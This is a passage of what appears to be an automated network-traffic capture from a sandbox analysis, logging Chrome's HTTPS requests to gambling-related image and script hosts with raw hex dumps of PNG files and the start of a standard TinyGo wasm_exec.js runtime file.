                                                                                                                                                          2024-06-09 22:41:23 UTC4096INData Raw: 76 b6 07 48 05 f6 3a 19 33 e1 cf 0f d4 47 a9 1f f8 89 a8 f8 8e a2 aa ad 61 d4 4f 2f 98 37 a1 0d 66 93 84 95 77 b4 12 36 d5 9a c2 fe 4c 0d d4 fc 0d 29 34 31 58 54 4d 7c 32 c4 90 c6 91 b2 b4 a0 04 2c 35 b1 b1 b6 a7 dd 44 b6 c0 4c ae 95 8c 95 96 34 24 9d 00 ad 61 15 32 e0 26 2f 90 75 95 9c 28 b1 3d 0d 64 a1 a4 b3 6c ca ca 08 2c 1b a8 36 ac d5 95 4a ec 2d 4c 23 91 49 22 45 29 43 30 89 da 15 36 79 42 92 a3 d8 5b a5 43 0a 50 19 20 34 80 4c 87 71 48 dd da d5 b4 98 2c d5 30 a4 04 b6 2a 44 06 be bb b6 9f fb 60 f4 f8 50 84 68 25 20 46 9f b2 a0 11 89 8e b5 18 b4 8b 52 3c 82 2d 5b 5f 0e 95 18 40 1a bd 61 04 00 d5 26 34 73 a0 28 41 17 d2 a0 3a c1 3d c1 a2 9e 56 1b f4 8d 64 61 ef 0b 6f df 56 dc fa 62 27 d5 34 5c e6 d6 88 38 fb f1 fd cf 8d 54 bd 63 b7 49 8e 58 25 91 ca
                                                                                                                                                          Data Ascii: vH:3GaO/7fw6L)41XTM|2,5DL4$a2&/u(=dl,6J-L#I"E)C06yB[CP 4LqH,0*D`Ph% FR<-[_@a&4s(A:=VdaoVb'4\8TcIX%
                                                                                                                                                          2024-06-09 22:41:23 UTC4096INData Raw: 7f 48 8f 03 33 69 ff 00 41 c5 34 aa 04 52 76 a9 3e 43 ec a3 01 35 92 06 f2 a9 48 77 45 2c d7 1a 54 80 b1 ac b2 2e 0e 9d 28 75 97 ee 23 a4 63 dc db 5e 9d 28 88 8e c4 c6 ea 74 26 e2 a4 5d c4 f5 33 59 c4 2f fd 94 76 b0 2c ce 47 f7 8d 51 70 eb 2e b7 d2 0d cd e3 73 64 99 a4 f4 44 97 e9 b4 8b fc 8d a8 ab 88 0a d6 6c 3b 33 3d 7b 6e 19 39 48 38 d5 cb ee 38 e7 68 30 17 29 7f 0f 16 19 14 17 9c 29 23 73 5d 6c 2c 74 bb 7b 2b 9e 7d c2 b7 63 22 c2 5a cd be d6 b1 4d 4b aa 7f bb 79 87 d3 6c 78 04 1a b3 93 d4 ec 1a 75 9d 5b ed 47 19 c8 65 66 dc 3c 5e 32 dd cb 50 36 bd cd 2c 63 a9 fa ae 31 ea 6e 37 d3 6c 0d 69 bc d1 bc 3b 57 17 de 5c 5f 76 e1 9e 0b be 30 e0 8e 49 bf e1 67 45 b9 62 dd d0 1b 92 4c 64 7f 35 ed e7 61 5c 66 df 6e be 03 9e 4b b5 ef bb 35 bf ae c3 ff 00 bb b7 c7
                                                                                                                                                          Data Ascii: H3iA4Rv>C5HwE,T.(u#c^(t&]3Y/v,GQp.sdDl;3={n9H88h0))#s]l,t{+}c"ZMKylxu[Gef<^2P6,c1n7li;W\_v0IgEbLd5a\fnK5
                                                                                                                                                          2024-06-09 22:41:23 UTC1792INData Raw: 3a 82 3a 1a d8 93 34 02 74 7c f3 34 bc 04 32 c1 bc b8 8b 1e 52 12 e0 95 01 4b 74 f0 b7 5a ac cb 6c d3 76 b1 5f 9b 39 91 b4 7c 66 24 f9 19 12 2d 83 32 6d 8e 32 46 a5 98 e9 a5 0a c6 16 76 fd 44 42 5c 7e 29 c2 c3 c7 c4 dc 1d a2 5b 33 0e 85 89 b9 b7 c4 d1 11 2e 3e e6 26 3b f3 28 e2 f0 a3 e4 0f 06 45 b2 7f 7d b6 af c8 9a 91 24 39 0d c8 fa 0e f8 d1 40 b2 81 f8 71 b9 67 2d e6 2e 36 ad fc ba d4 85 69 5d 66 13 23 94 e4 27 73 14 f9 32 5c b1 06 04 ba 7f b3 b1 00 37 1e da 06 64 85 55 95 16 39 8d f6 c1 21 23 42 6c 14 e8 7c 7e 34 84 88 de e0 9a 7e 36 15 c7 e2 b2 b2 88 fc 69 d1 c3 5f 52 aa 0e d0 a7 e2 6e 69 86 a2 55 71 ea 60 e3 93 33 4b c7 bc 9a a6 26 54 48 8f 63 d0 92 36 93 e3 61 d3 d8 69 07 58 69 d6 6c 48 b1 22 ac 94 c6 da a4 32 29 96 f1 9f 61 15 24 12 74 3f 4a 1f 1b
                                                                                                                                                          Data Ascii: ::4t|42RKtZlv_9|f$-2m2FvDB\~)[3.>&;(E}$9@qg-.6i]f#'s2\7dU9!#Bl|~4~6i_RniUq`3K&THc6aiXilH"2)a$t?J
                                                                                                                                                          2024-06-09 22:41:23 UTC1865INData Raw: 60 48 19 49 06 cb d4 68 47 85 03 0a f5 98 c9 65 9c f5 c8 91 87 b5 98 fd a6 96 5f 49 42 42 df ce c7 e3 46 03 29 3f 5b f5 3e 64 dc d1 8b 49 11 1a 8a 90 45 14 60 8b 4b 0c d9 f6 b6 30 1e ae 5b e8 64 fa 10 f9 22 9b b1 f8 91 fb 28 88 8c 61 27 be 4b e4 4e 47 d2 a3 72 8f 6b 9d a8 bf 21 4d 16 24 84 7e 6e 18 57 ee c5 b5 7e 11 8d 7f de 26 a4 92 c9 1e ac 98 71 ff 00 3c a2 46 f8 1b fd b6 a9 24 63 1f 53 23 18 f5 13 f2 4f 25 ff 00 b3 04 64 0f b2 a4 13 13 ca 31 38 dc 77 f6 ff 00 31 25 fd ad 2d bf 75 30 80 c1 3f e9 f2 a7 82 78 f9 78 e8 0f bc ea 68 49 26 c2 cd cb e3 73 71 39 1e 3f 21 f0 f3 f0 27 8f 27 0b 2e 22 55 e2 96 27 0f 1b a3 0e 85 58 02 0d 2b 20 70 41 15 06 32 b1 52 08 d0 89 f4 57 6f 7e a9 67 e6 61 72 9c 96 2f 6d 70 3c 3f 73 72 42 7c 4e 4f ba 70 31 e7 8f 2e 4f cc 46
                                                                                                                                                          Data Ascii: `HIhGe_IBBF)?[>dIE`K0[d"(a'KNGrk!M$~nW~&q<F$cS#O%d18w1%-u0?xxhI&sq9?!''."U'X+ pA2RWo~gar/mp<?srB|NOp1.OF


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          656192.168.2.55043690.84.161.224434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                          2024-06-09 22:41:22 UTC645OUTGET /pc/image-pc/index/125/top/icon_1.png HTTP/1.1
                                                                                                                                                          Host: zb-hw.czwygs.com
                                                                                                                                                          Connection: keep-alive
                                                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                                                          Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                          Sec-Fetch-Site: cross-site
                                                                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                                                                          Sec-Fetch-Dest: image
                                                                                                                                                          Referer: https://zb-hw.czwygs.com/pc/240516-03/static/css/t4043.css
                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                          2024-06-09 22:41:22 UTC611INHTTP/1.1 200 OK
                                                                                                                                                          Date: Sun, 09 Jun 2024 22:41:22 GMT
                                                                                                                                                          Content-Type: image/png
                                                                                                                                                          Content-Length: 193
                                                                                                                                                          Connection: close
                                                                                                                                                          Server: openresty
                                                                                                                                                          Last-Modified: Tue, 25 Jul 2023 02:48:01 GMT
                                                                                                                                                          ETag: "64bf37e1-c1"
                                                                                                                                                          Via: EU-GER-frankfurt-EDGE5-CACHE2[5],EU-GER-frankfurt-EDGE5-CACHE1[0,TCP_HIT,4],EU-FRA-paris-GLOBAL1-CACHE8[3],EU-FRA-paris-GLOBAL1-CACHE7[0,TCP_HIT,1],1.1 google
                                                                                                                                                          X-CCDN-Expires: 2063154
                                                                                                                                                          x-hcs-proxy-type: 1
                                                                                                                                                          X-CCDN-CacheTTL: 2592000
                                                                                                                                                          X-CCDN-REQ-ID-46B1: ad728c6bc6be78cb25ea9a048c97ca58
                                                                                                                                                          alt-svc: h3=":443"; ma=2592000
                                                                                                                                                          nginx-hit: 1
                                                                                                                                                          Age: 528846
                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                          Access-Control-Allow-Origin: *
                                                                                                                                                          2024-06-09 22:41:22 UTC193INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 0c 00 00 00 10 08 06 00 00 00 22 61 9e 07 00 00 00 09 70 48 59 73 00 00 0b 13 00 00 0b 13 01 00 9a 9c 18 00 00 00 73 49 44 41 54 28 91 cd 92 bb 0d 80 30 0c 05 1f 9f 1d d8 06 d1 b2 07 73 b0 5a c4 32 0c 40 8f 8e 82 18 05 04 c4 05 05 27 b9 89 df 29 92 6d 01 3d 30 e3 44 31 3c 00 0d 50 c5 b7 c7 2a b5 b3 48 5a 25 a1 0c 05 90 0d a5 d4 26 3a f3 94 f9 cc 99 4f 84 49 52 f7 68 24 e3 b5 32 02 d0 5e 7b 6f 82 31 7a 85 00 74 9e 1f a6 9b e0 21 d8 e2 7e b4 07 3b 0d f7 3d 6d 39 60 06 28 72 84 fb a8 00 00 00 00 49 45 4e 44 ae 42 60 82
                                                                                                                                                          Data Ascii: PNGIHDR"apHYssIDAT(0sZ2@')m=0D1<P*HZ%&:OIRh$2^{o1zt!~;=m9`(rIENDB`


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          657192.168.2.55043490.84.161.224434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                          2024-06-09 22:41:22 UTC379OUTGET /pc/image-pc/index/312/nav/casino/01.png HTTP/1.1
                                                                                                                                                          Host: zb-hw.czwygs.com
                                                                                                                                                          Connection: keep-alive
                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                          Accept: */*
                                                                                                                                                          Sec-Fetch-Site: none
                                                                                                                                                          Sec-Fetch-Mode: cors
                                                                                                                                                          Sec-Fetch-Dest: empty
                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                          2024-06-09 22:41:23 UTC617INHTTP/1.1 200 OK
                                                                                                                                                          Date: Sun, 09 Jun 2024 22:41:22 GMT
                                                                                                                                                          Content-Type: image/png
                                                                                                                                                          Content-Length: 38521
                                                                                                                                                          Connection: close
                                                                                                                                                          Server: openresty
                                                                                                                                                          Last-Modified: Fri, 06 Sep 2019 06:36:44 GMT
                                                                                                                                                          ETag: "5d71fe7c-9679"
                                                                                                                                                          Via: EU-GER-frankfurt-EDGE5-CACHE1[2],EU-GER-frankfurt-EDGE5-CACHE1[0,TCP_HIT,0],EU-FRA-paris-GLOBAL1-CACHE19[3],EU-FRA-paris-GLOBAL1-CACHE23[0,TCP_HIT,1],1.1 google
                                                                                                                                                          X-CCDN-Expires: 2465102
                                                                                                                                                          x-hcs-proxy-type: 1
                                                                                                                                                          X-CCDN-CacheTTL: 2592000
                                                                                                                                                          X-CCDN-REQ-ID-46B1: 0d7ee29488888078f3ea6d6ca67cb088
                                                                                                                                                          alt-svc: h3=":443"; ma=2592000
                                                                                                                                                          nginx-hit: 1
                                                                                                                                                          Age: 126900
                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                          Access-Control-Allow-Origin: *
                                                                                                                                                          2024-06-09 22:41:23 UTC15767INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 8b 00 00 00 8b 08 06 00 00 00 51 19 6a ff 00 00 00 04 67 41 4d 41 00 00 b1 8f 0b fc 61 05 00 00 00 20 63 48 52 4d 00 00 7a 26 00 00 80 84 00 00 fa 00 00 00 80 e8 00 00 75 30 00 00 ea 60 00 00 3a 98 00 00 17 70 9c ba 51 3c 00 00 00 06 62 4b 47 44 00 00 00 00 00 00 f9 43 bb 7f 00 00 80 00 49 44 41 54 78 da ec fd 77 b8 25 57 75 e6 01 ff 76 a8 aa 93 cf cd b7 73 52 56 2b 02 ca 02 01 06 19 91 0c 06 6c a2 c1 c6 80 48 c6 11 87 cf c6 9e 60 cf 8c 8d c7 33 60 72 34 c9 d8 c6 36 98 20 14 50 96 50 0e 2d b5 ba 5b ea 9c 6e df 7c 4f ac b4 c3 f7 47 9d db dd 22 49 1a 90 67 be 6f 66 f7 53 cf bd 7d ee 39 75 aa f6 5e b5 f6 0a ef 7a 97 e0 7f f3 90 c8 a7 f4 7e 87 fb c9 6f 10 4f e1 64 7e f0 b3 74 12 97 bc e5 6f 26 96 1a 27
                                                                                                                                                          Data Ascii: PNGIHDRQjgAMAa cHRMz&u0`:pQ<bKGDCIDATxw%WuvsRV+lH`3`r46 PP-[n|OG"IgofS}9u^z~oOd~to&'
                                                                                                                                                          2024-06-09 22:41:23 UTC16384INData Raw: e8 56 87 de 43 40 ab 20 e2 2b ce ba e2 e9 b8 61 3f c0 81 38 e7 4c b9 5c 9e 1f 1a 1a 5a a3 b5 96 91 52 58 49 75 a1 db ae 88 28 68 8c 8f 8c b3 ed e1 ad d3 dd 6e 67 24 2c 85 a5 b0 5a f6 fd 4e 4f 48 eb 08 84 20 4f 7b 4c 8c 0d 91 57 42 0e 1f 9e c1 78 4d 22 24 b9 b5 08 a5 11 ce e1 c8 48 5d d1 9f c4 4b 85 94 9a 72 58 65 7c 74 88 89 b1 71 4a e5 12 d6 18 94 82 72 39 64 68 a8 81 6b c7 18 2b f1 de 21 a5 44 0e 68 42 a2 28 42 4a 89 b3 ce 39 eb 70 ce d5 ad 70 fd 63 c9 8f e3 ca cd 7f c6 63 59 1b 4b cf 0a 2c 3b 11 29 d0 82 a9 2d ee fe 0f fd e1 11 82 26 44 8e e6 8b 2e 53 75 d3 56 07 af ff e7 82 e3 fd 07 bb c8 0f a8 c6 bc 34 2d 2b 5d 43 23 4b 18 54 10 78 fa cb 3d 90 8b 6a c3 65 a2 e3 98 a1 aa 3a 63 78 dd ca 35 f1 3b 5f 2f 6a 41 66 2b c9 a1 bd df fc db 5b b7 86 a2 d0 42 03
                                                                                                                                                          Data Ascii: VC@ +a?8L\ZRXIu(hng$,ZNOH O{LWBxM"$H]KrXe|tqJr9dhk+!DhB(BJ9ppccYK,;)-&D.SuV4-+]C#KTx=je:cx5;_/jAf+[B
                                                                                                                                                          2024-06-09 22:41:23 UTC6370INData Raw: 1e ee c1 3d 93 e6 fd 17 f3 5b 4e f2 5e 86 f6 b2 8c c5 47 43 8e 18 b0 aa 07 82 6e 88 2a e0 2c aa 44 07 3e 08 98 8c 75 4f 3c a1 11 8a 23 cf bf a2 37 95 5d 27 c7 49 f2 ef 3b 7f f2 6f c9 e2 73 df d4 2b 4b a5 d3 9b 89 58 3f b6 66 ad 86 d4 fb 21 aa 80 b1 f0 b3 07 56 3d 7f f6 d9 67 dd 20 a5 71 ed 56 f3 28 ac 0a 16 2d 5e c8 fc 95 f3 91 95 08 5b 6b 52 9f 1c 47 67 31 85 62 11 89 af f4 8a 20 40 0a 81 b4 96 40 48 9c f4 15 dd 4c eb ce f1 d1 71 fc 91 1d 4a b5 90 52 b5 4a 57 6f 2f 2a 2a e0 94 24 d7 86 7a bd 49 92 e6 a4 b9 e7 b1 b5 4e 78 42 6a 07 da 79 7c 89 f3 3d 33 38 24 03 43 33 e9 9b 31 c8 e0 cc d9 0c ce 9a cb d2 15 fb 31 77 fe 52 e6 2d 5c ca bc 85 cb 58 b0 78 29 4b 96 2c 71 47 1f 73 cc 78 77 b5 eb e3 59 33 f9 f4 21 47 1d ba d3 e0 70 36 c5 89 22 04 43 10 cc a2 b4 f2
                                                                                                                                                          Data Ascii: =[N^GCn*,D>uO<#7]'I;os+KX?f!V=g qV(-^[kRGg1b @@HLqJRJWo/**$zINxBjy|=38$C311wR-\Xx)K,qGsxwY3!Gp6"C


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          658192.168.2.550443188.114.96.34434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                          2024-06-09 22:41:22 UTC525OUTGET /wasm_exec.js HTTP/1.1
                                                                                                                                                          Host: stt-wasm.ai4funs.com
                                                                                                                                                          Connection: keep-alive
                                                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                                                          Accept: */*
                                                                                                                                                          Sec-Fetch-Site: cross-site
                                                                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                                                                          Sec-Fetch-Dest: script
                                                                                                                                                          Referer: https://yh8613.cc/
                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                          2024-06-09 22:41:22 UTC860INHTTP/1.1 200 OK
                                                                                                                                                          Date: Sun, 09 Jun 2024 22:41:22 GMT
                                                                                                                                                          Content-Type: application/javascript
                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                          Connection: close
                                                                                                                                                          Access-Control-Allow-Origin: *
                                                                                                                                                          Cache-Control: public, max-age=14400, must-revalidate
                                                                                                                                                          ETag: W/"cb86ea27dd7c6c898f98d617d86fb707"
                                                                                                                                                          referrer-policy: strict-origin-when-cross-origin
                                                                                                                                                          x-content-type-options: nosniff
                                                                                                                                                          x-robots-tag: nosnippet
                                                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=CGOx5SWCPNPx5Hr8zkvQCQE%2BGVKCALe7S3kwKNYUbcGCt1utclKA5dEBDjEfFH%2FXF05pz%2FABOUszeu4%2BPaPVWRDhHx3RxaQWnGjKy%2B%2Bdsp9GEkba2n81jXf%2FQdg4NGM%2FmmqUvbJ8ig%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                          Vary: Accept-Encoding
                                                                                                                                                          CF-Cache-Status: HIT
                                                                                                                                                          Age: 451
                                                                                                                                                          Server: cloudflare
                                                                                                                                                          CF-RAY: 8914a0f5aea16bdd-DFW
                                                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                                                          2024-06-09 22:41:22 UTC509INData Raw: 33 66 36 34 0d 0a 2f 2f 20 43 6f 70 79 72 69 67 68 74 20 32 30 31 38 20 54 68 65 20 47 6f 20 41 75 74 68 6f 72 73 2e 20 41 6c 6c 20 72 69 67 68 74 73 20 72 65 73 65 72 76 65 64 2e 0a 2f 2f 20 55 73 65 20 6f 66 20 74 68 69 73 20 73 6f 75 72 63 65 20 63 6f 64 65 20 69 73 20 67 6f 76 65 72 6e 65 64 20 62 79 20 61 20 42 53 44 2d 73 74 79 6c 65 0a 2f 2f 20 6c 69 63 65 6e 73 65 20 74 68 61 74 20 63 61 6e 20 62 65 20 66 6f 75 6e 64 20 69 6e 20 74 68 65 20 4c 49 43 45 4e 53 45 20 66 69 6c 65 2e 0a 2f 2f 0a 2f 2f 20 54 68 69 73 20 66 69 6c 65 20 68 61 73 20 62 65 65 6e 20 6d 6f 64 69 66 69 65 64 20 66 6f 72 20 75 73 65 20 62 79 20 74 68 65 20 54 69 6e 79 47 6f 20 63 6f 6d 70 69 6c 65 72 2e 0a 0a 28 28 29 20 3d 3e 20 7b 0a 09 2f 2f 20 4d 61 70 20 6d 75 6c 74 69 70
                                                                                                                                                          Data Ascii: 3f64// Copyright 2018 The Go Authors. All rights reserved.// Use of this source code is governed by a BSD-style// license that can be found in the LICENSE file.//// This file has been modified for use by the TinyGo compiler.(() => {// Map multip
                                                                                                                                                          2024-06-09 22:41:22 UTC1369INData Raw: 09 7d 20 65 6c 73 65 20 69 66 20 28 74 79 70 65 6f 66 20 77 69 6e 64 6f 77 20 21 3d 3d 20 22 75 6e 64 65 66 69 6e 65 64 22 29 20 7b 0a 09 09 77 69 6e 64 6f 77 2e 67 6c 6f 62 61 6c 20 3d 20 77 69 6e 64 6f 77 3b 0a 09 7d 20 65 6c 73 65 20 69 66 20 28 74 79 70 65 6f 66 20 73 65 6c 66 20 21 3d 3d 20 22 75 6e 64 65 66 69 6e 65 64 22 29 20 7b 0a 09 09 73 65 6c 66 2e 67 6c 6f 62 61 6c 20 3d 20 73 65 6c 66 3b 0a 09 7d 20 65 6c 73 65 20 7b 0a 09 09 74 68 72 6f 77 20 6e 65 77 20 45 72 72 6f 72 28 22 63 61 6e 6e 6f 74 20 65 78 70 6f 72 74 20 47 6f 20 28 6e 65 69 74 68 65 72 20 67 6c 6f 62 61 6c 2c 20 77 69 6e 64 6f 77 20 6e 6f 72 20 73 65 6c 66 20 69 73 20 64 65 66 69 6e 65 64 29 22 29 3b 0a 09 7d 0a 0a 09 69 66 20 28 21 67 6c 6f 62 61 6c 2e 72 65 71 75 69 72 65 20
                                                                                                                                                          Data Ascii: } else if (typeof window !== "undefined") {window.global = window;} else if (typeof self !== "undefined") {self.global = self;} else {throw new Error("cannot export Go (neither global, window nor self is defined)");}if (!global.require
                                                                                                                                                          2024-06-09 22:41:22 UTC1369INData Raw: 2c 0a 09 09 09 66 63 68 6f 77 6e 28 66 64 2c 20 75 69 64 2c 20 67 69 64 2c 20 63 61 6c 6c 62 61 63 6b 29 20 7b 20 63 61 6c 6c 62 61 63 6b 28 65 6e 6f 73 79 73 28 29 29 3b 20 7d 2c 0a 09 09 09 66 73 74 61 74 28 66 64 2c 20 63 61 6c 6c 62 61 63 6b 29 20 7b 20 63 61 6c 6c 62 61 63 6b 28 65 6e 6f 73 79 73 28 29 29 3b 20 7d 2c 0a 09 09 09 66 73 79 6e 63 28 66 64 2c 20 63 61 6c 6c 62 61 63 6b 29 20 7b 20 63 61 6c 6c 62 61 63 6b 28 6e 75 6c 6c 29 3b 20 7d 2c 0a 09 09 09 66 74 72 75 6e 63 61 74 65 28 66 64 2c 20 6c 65 6e 67 74 68 2c 20 63 61 6c 6c 62 61 63 6b 29 20 7b 20 63 61 6c 6c 62 61 63 6b 28 65 6e 6f 73 79 73 28 29 29 3b 20 7d 2c 0a 09 09 09 6c 63 68 6f 77 6e 28 70 61 74 68 2c 20 75 69 64 2c 20 67 69 64 2c 20 63 61 6c 6c 62 61 63 6b 29 20 7b 20 63 61 6c 6c
                                                                                                                                                          Data Ascii: ,fchown(fd, uid, gid, callback) { callback(enosys()); },fstat(fd, callback) { callback(enosys()); },fsync(fd, callback) { callback(null); },ftruncate(fd, length, callback) { callback(enosys()); },lchown(path, uid, gid, callback) { call
                                                                                                                                                          2024-06-09 22:41:22 UTC1369INData Raw: 69 72 28 29 20 7b 20 74 68 72 6f 77 20 65 6e 6f 73 79 73 28 29 3b 20 7d 2c 0a 09 09 7d 0a 09 7d 0a 0a 09 69 66 20 28 21 67 6c 6f 62 61 6c 2e 63 72 79 70 74 6f 29 20 7b 0a 09 09 63 6f 6e 73 74 20 6e 6f 64 65 43 72 79 70 74 6f 20 3d 20 72 65 71 75 69 72 65 28 22 63 72 79 70 74 6f 22 29 3b 0a 09 09 67 6c 6f 62 61 6c 2e 63 72 79 70 74 6f 20 3d 20 7b 0a 09 09 09 67 65 74 52 61 6e 64 6f 6d 56 61 6c 75 65 73 28 62 29 20 7b 0a 09 09 09 09 6e 6f 64 65 43 72 79 70 74 6f 2e 72 61 6e 64 6f 6d 46 69 6c 6c 53 79 6e 63 28 62 29 3b 0a 09 09 09 7d 2c 0a 09 09 7d 3b 0a 09 7d 0a 0a 09 69 66 20 28 21 67 6c 6f 62 61 6c 2e 70 65 72 66 6f 72 6d 61 6e 63 65 29 20 7b 0a 09 09 67 6c 6f 62 61 6c 2e 70 65 72 66 6f 72 6d 61 6e 63 65 20 3d 20 7b 0a 09 09 09 6e 6f 77 28 29 20 7b 0a 09
                                                                                                                                                          Data Ascii: ir() { throw enosys(); },}}if (!global.crypto) {const nodeCrypto = require("crypto");global.crypto = {getRandomValues(b) {nodeCrypto.randomFillSync(b);},};}if (!global.performance) {global.performance = {now() {
                                                                                                                                                          2024-06-09 22:41:22 UTC1369INData Raw: 09 09 69 66 20 28 21 69 73 4e 61 4e 28 66 29 29 20 7b 0a 09 09 09 09 09 72 65 74 75 72 6e 20 66 3b 0a 09 09 09 09 7d 0a 0a 09 09 09 09 63 6f 6e 73 74 20 69 64 20 3d 20 6d 65 6d 28 29 2e 67 65 74 55 69 6e 74 33 32 28 61 64 64 72 2c 20 74 72 75 65 29 3b 0a 09 09 09 09 72 65 74 75 72 6e 20 74 68 69 73 2e 5f 76 61 6c 75 65 73 5b 69 64 5d 3b 0a 09 09 09 7d 0a 0a 09 09 09 63 6f 6e 73 74 20 73 74 6f 72 65 56 61 6c 75 65 20 3d 20 28 61 64 64 72 2c 20 76 29 20 3d 3e 20 7b 0a 09 09 09 09 63 6f 6e 73 74 20 6e 61 6e 48 65 61 64 20 3d 20 30 78 37 46 46 38 30 30 30 30 3b 0a 0a 09 09 09 09 69 66 20 28 74 79 70 65 6f 66 20 76 20 3d 3d 3d 20 22 6e 75 6d 62 65 72 22 29 20 7b 0a 09 09 09 09 09 69 66 20 28 69 73 4e 61 4e 28 76 29 29 20 7b 0a 09 09 09 09 09 09 6d 65 6d 28 29
                                                                                                                                                          Data Ascii: if (!isNaN(f)) {return f;}const id = mem().getUint32(addr, true);return this._values[id];}const storeValue = (addr, v) => {const nanHead = 0x7FF80000;if (typeof v === "number") {if (isNaN(v)) {mem()
                                                                                                                                                          2024-06-09 22:41:22 UTC1369INData Raw: 20 22 73 79 6d 62 6f 6c 22 3a 0a 09 09 09 09 09 09 74 79 70 65 46 6c 61 67 20 3d 20 33 3b 0a 09 09 09 09 09 09 62 72 65 61 6b 3b 0a 09 09 09 09 09 63 61 73 65 20 22 66 75 6e 63 74 69 6f 6e 22 3a 0a 09 09 09 09 09 09 74 79 70 65 46 6c 61 67 20 3d 20 34 3b 0a 09 09 09 09 09 09 62 72 65 61 6b 3b 0a 09 09 09 09 7d 0a 09 09 09 09 6d 65 6d 28 29 2e 73 65 74 55 69 6e 74 33 32 28 61 64 64 72 20 2b 20 34 2c 20 6e 61 6e 48 65 61 64 20 7c 20 74 79 70 65 46 6c 61 67 2c 20 74 72 75 65 29 3b 0a 09 09 09 09 6d 65 6d 28 29 2e 73 65 74 55 69 6e 74 33 32 28 61 64 64 72 2c 20 69 64 2c 20 74 72 75 65 29 3b 0a 09 09 09 7d 0a 0a 09 09 09 63 6f 6e 73 74 20 6c 6f 61 64 53 6c 69 63 65 20 3d 20 28 61 72 72 61 79 2c 20 6c 65 6e 2c 20 63 61 70 29 20 3d 3e 20 7b 0a 09 09 09 09 72 65
                                                                                                                                                          Data Ascii: "symbol":typeFlag = 3;break;case "function":typeFlag = 4;break;}mem().setUint32(addr + 4, nanHead | typeFlag, true);mem().setUint32(addr, id, true);}const loadSlice = (array, len, cap) => {re
                                                                                                                                                          2024-06-09 22:41:22 UTC1369INData Raw: 69 74 65 20 6c 69 6e 65 0a 09 09 09 09 09 09 09 09 09 09 6c 65 74 20 6c 69 6e 65 20 3d 20 64 65 63 6f 64 65 72 2e 64 65 63 6f 64 65 28 6e 65 77 20 55 69 6e 74 38 41 72 72 61 79 28 6c 6f 67 4c 69 6e 65 29 29 3b 0a 09 09 09 09 09 09 09 09 09 09 6c 6f 67 4c 69 6e 65 20 3d 20 5b 5d 3b 0a 09 09 09 09 09 09 09 09 09 09 63 6f 6e 73 6f 6c 65 2e 6c 6f 67 28 6c 69 6e 65 29 3b 0a 09 09 09 09 09 09 09 09 09 7d 20 65 6c 73 65 20 7b 0a 09 09 09 09 09 09 09 09 09 09 6c 6f 67 4c 69 6e 65 2e 70 75 73 68 28 63 29 3b 0a 09 09 09 09 09 09 09 09 09 7d 0a 09 09 09 09 09 09 09 09 7d 0a 09 09 09 09 09 09 09 7d 0a 09 09 09 09 09 09 7d 20 65 6c 73 65 20 7b 0a 09 09 09 09 09 09 09 63 6f 6e 73 6f 6c 65 2e 65 72 72 6f 72 28 27 69 6e 76 61 6c 69 64 20 66 69 6c 65 20 64 65 73 63 72 69
                                                                                                                                                          Data Ascii: ite linelet line = decoder.decode(new Uint8Array(logLine));logLine = [];console.log(line);} else {logLine.push(c);}}}} else {console.error('invalid file descri
